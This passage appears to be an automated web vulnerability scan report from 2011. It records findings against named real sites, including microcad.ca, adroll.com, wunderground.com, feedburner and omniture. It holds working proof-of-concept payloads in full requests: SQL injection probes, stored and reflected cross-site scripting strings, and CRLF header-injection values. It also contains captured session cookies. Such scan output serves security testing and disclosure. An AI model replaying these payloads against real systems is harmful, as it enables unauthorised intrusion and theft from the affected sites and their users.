Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx?ci=8346
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM'%20and%201%3d2--%20; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: traffic=server=M1PWCORPWEB109&sitename=www%2Egodaddy%2Ecom&referringdomain=&referringpath=19a7e39c%2Ddcff%2D40f6%2D8f6d%2De19d0c50259d&shopper=46215917&querystring=ci%3D42031%26config%3Dssldefault&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&cookies=1&split=14; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:49:53 GMT
Content-Length: 275694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Low cost domain names, domain transfers, web hosting, email accounts, and so much more.</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Pragma" content="no-cache">
<meta name="description" content="Register & transfer domains for less. Reliable hosting. Easy-to-use site builders. Affordable SSL certificates. eCommerce solutions. ICANN-accredited.">
<meta name="keywords" content="domain name, domain registration, registrar, renewal, transfer domain, cheap, inexpensive, domain, register, DNS, URL, web address, internet address, web site name, bulk domain registration, buy domain, private domain registration, bulk price, .com, .net, .org, Go Daddy.com, Go Daddy, godaddy.com, godaddy">
<link rel="shortcut icon" href="http://imagesak.securepaynet.net/assets/godaddy.ico">
<link rel="stylesheet" type="text/css" href="http://img2.wsimg.com/pc_css/1/gd_20110829_http.min.css" /><link rel="stylesheet" type="text/css" href="http://imagesak.securepaynet.net/css/20090113_1.css">

<style type="text/css">
ul.bul
...[SNIP]...

1.19. http://www.microcad.ca/cart/add/ [productid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.microcad.ca
Path:   /cart/add/

Issue detail

The productid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the productid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /cart/add/ HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search
Content-Length: 31
Cache-Control: max-age=0
Origin: http://www.microcad.ca
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: public=mrff84dil681s0lpbfousev6i6; __utma=84250501.1276542809.1315085415.1315085415.1315085415.1; __utmb=84250501.1.10.1315085415; __utmc=84250501; __utmz=84250501.1315085415.1.1.utmcsr=google|utmccn=(not%20set)|utmcmd=product-search|utmctr=ssl%20certificates; mf_user=1; mf_session=bc76099c1b4cf7981cbda530d0e66b84; mf_lastpageview=1315085419325

quantity=1&productid=1011956760'

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1212
Content-Type: text/html
ACCEPT-RANGES: none

<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">

<h4>A PHP Error was encountered</h4>

<p>Severity: Notice</p>
<p>Message: Undefined index: 1011956760'</p>
<p>Filename: mo
...[SNIP]...
ctdescriptions pd2 ON (p.productid = pd2.productid AND pd2.type = '3' AND pd2.localeid = '3')
               JOIN manufacturer m ON (p.manufacturerid = m.manufacturerid)
               WHERE p.productid = '1011956760'' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1011956760''' at line 7

1.20. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.microcad.ca
Path:   /products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760'?utm_source=google&utm_medium=product-search HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:28:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 226
Content-Type: text/html
ACCEPT-RANGES: none

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND an.localeid = '3' AND hn.localeid = '3' AND pa.localeid = '3'
                   ORDE' at line 7

2. Cross-site scripting (stored)

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.microcad.ca
Path:   /cart

Issue detail

The value of the productid request parameter submitted to the URL /cart/add/ is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks at the URL /cart. The payload 1542d'><script>alert(1)</script>91926b477ff was submitted in the productid parameter. This input was returned unmodified in a subsequent request for the URL /cart.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

POST /cart/add/ HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search
Content-Length: 31
Cache-Control: max-age=0
Origin: http://www.microcad.ca
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: public=mrff84dil681s0lpbfousev6i6; __utma=84250501.1276542809.1315085415.1315085415.1315085415.1; __utmb=84250501.1.10.1315085415; __utmc=84250501; __utmz=84250501.1315085415.1.1.utmcsr=google|utmccn=(not%20set)|utmcmd=product-search|utmctr=ssl%20certificates; mf_user=1; mf_session=bc76099c1b4cf7981cbda530d0e66b84; mf_lastpageview=1315085419325

quantity=1&productid=1542d'><script>alert(1)</script>91926b477ff

Request 2

GET /cart HTTP/1.1
Host: www.microcad.ca
Proxy-Connection: keep-alive
Referer: http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760?utm_source=google&utm_medium=product-search
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: public=mrff84dil681s0lpbfousev6i6; __utma=84250501.1276542809.1315085415.1315085415.1315085415.1; __utmb=84250501.1.10.1315085415; __utmc=84250501; __utmz=84250501.1315085415.1.1.utmcsr=google|utmccn=(not%20set)|utmcmd=product-search|utmctr=ssl%20certificates; mf_user=1; mf_session=bc76099c1b4cf7981cbda530d0e66b84; mf_lastpageview=1315085419325

Response 2

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:35:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 18528
Content-Type: text/html
ACCEPT-RANGES: none

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Microcad.ca | Sho
...[SNIP]...
<a href='/cart/remove/1542d'><script>alert(1)</script>91926b477ff'>
...[SNIP]...

3. HTTP header injection
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b60f6%0d%0aefd8c279903 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/b60f6%0d%0aefd8c279903/GBRCJV675BABRAPIIGSPD6?pv=76956596667.87833&cookie=&keyw=ssl+certificates HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 21:40:01 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/b60f6
efd8c279903
/GBRCJV675BABRAPIIGSPD6/3NUTGTWFSRFIPAWBFDEMYM.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


3.2. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload efac1%0d%0a99e4b85b399 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/TL4HVZJAKBDONOOUY7KOKV/efac1%0d%0a99e4b85b399?pv=76956596667.87833&cookie=&keyw=ssl+certificates HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 21:40:13 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/TL4HVZJAKBDONOOUY7KOKV/efac1
99e4b85b399
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


3.3. http://www.wunderground.com/dotset.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /dotset.php

Issue detail

The value of the id request parameter is copied into the Set-Cookie response header. The payload 10dc5%0d%0a0e6b87e611 was submitted in the id parameter. This caused a response containing an injected HTTP header.

Request

GET /dotset.php?id=10dc5%0d%0a0e6b87e611&t=1 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:34 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-Powered-By: PHP/4.4.0
Set-Cookie: dottag.10dc5
0e6b87e611
=1; expires=Sat, 17 Sep 2011 21:40:34 GMT; path=/; domain=.wunderground.com
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..

3.4. http://www.wunderground.com/dotset.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /dotset.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Set-Cookie response header. The payload 613a1%0d%0abc7451b72e2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /dotset.php?id=42/613a1%0d%0abc7451b72e2&t=1 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=4&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Domain&dtmc_product_id=TTN%3A%20Domains%3A%20Search%3A%20Taken&dtmc_domain_name=xss.com&dtm_items=&dtmc_domain_status=TAKEN&dtmc_domain_variations=xss.la&dtmc_source=WWW000000000W&dtmc_ref=http%3A//www.register.com/&dtmc_loc=http%3A//www.register.com/domain/searchresults.rcmx%3Fwebmetrics%3Dnull%26searchOrigin%3Dhomepage%26domain%3Dxss%26selectedTLDs%3D.com%26x%3D0%26y%3D0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:34 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-Powered-By: PHP/4.4.0
Set-Cookie: dottag.42/613a1
bc7451b72e2
=1; expires=Sat, 17 Sep 2011 21:40:34 GMT; path=/; domain=.wunderground.com
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..

4. Cross-site scripting (reflected)
There are 26 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://feeds.feedburner.com/~s/meetup [i parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.feedburner.com
Path:   /~s/meetup

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69d48"%3balert(1)//4b84e31d225 was submitted in the i parameter. This input was echoed as 69d48";alert(1)//4b84e31d225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /~s/meetup?i=http%3A%2F%2Fmeetupblog.meetup.com%2F2011%2F08%2Fhikingtips.html69d48"%3balert(1)//4b84e31d225 HTTP/1.1
Host: feeds.feedburner.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=UTF-8
Date: Sat, 03 Sep 2011 13:12:39 GMT
Expires: Sat, 03 Sep 2011 13:12:39 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 729
Server: GSE

var fStartPost=1;if(window.feedburner_currPost!=null){window.feedburner_currPost++}else{window.feedburner_currPost=1}if(document.body.getAttribute("fStartPost")){fs=parseInt(document.body.getAttribute
...[SNIP]...
window.feedburner_startPostOverride=fStartPost}if(window.feedburner_currPost==fStartPost){feedSrc='http://feeds.feedburner.com/~s/meetup?i='+escape("http://meetupblog.meetup.com/2011/08/hikingtips.html69d48";alert(1)//4b84e31d225")+'&showad=true';document.write('<script src="'+feedSrc+'" type="text/javascript">
...[SNIP]...

4.2. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload d0310<script>alert(1)</script>a8f786e5cdf was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=4&mbox=newhome_offerd0310<script>alert(1)</script>a8f786e5cdf&mboxId=0&mboxTime=1315043069350&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 135
Date: Sat, 03 Sep 2011 14:44:41 GMT
Server: Test & Target

mboxFactories.get('default').get('newhome_offerd0310<script>alert(1)</script>a8f786e5cdf',0).setOffer(new mboxOfferDefault()).loaded();

4.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload dcde1<img%20src%3da%20onerror%3dalert(1)>f66f189a6f5 was submitted in the mbox parameter. This input was echoed as dcde1<img src=a onerror=alert(1)>f66f189a6f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1315061061832-261883&mboxPC=1313976253453-233900.19&mboxPage=1315061061832-261883&screenHeight=1200&screenWidth=1920&browserWidth=1069&browserHeight=513&browserTimeOffset=-300&colorDepth=16&mboxCount=9&mbox=SiteCatalyst%3A%20eventdcde1<img%20src%3da%20onerror%3dalert(1)>f66f189a6f5&mboxId=0&mboxTime=1315043077971&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.7&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&eVar17=8%3A30AM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%23%250Afunction%2520Xss()%7Balert(%2527XSS%2527)%253B%7D&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
